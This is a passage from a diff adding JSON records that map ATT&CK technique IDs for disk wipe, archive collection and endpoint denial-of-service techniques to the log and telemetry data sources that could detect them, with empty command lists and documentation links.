"host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive access", + "description": "A drive partition was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "drive" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + 
"data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive modification", + "description": "A drive partition was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "drive" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1561", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are 
being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": 
"drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive access", + "description": "A drive partition was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "drive" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive modification", + "description": "A drive partition was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "drive" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1560.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + 
"technique_id": "T1499.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1499.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "application log", + 
"definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1499.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "application log", + 
"definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1499.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + 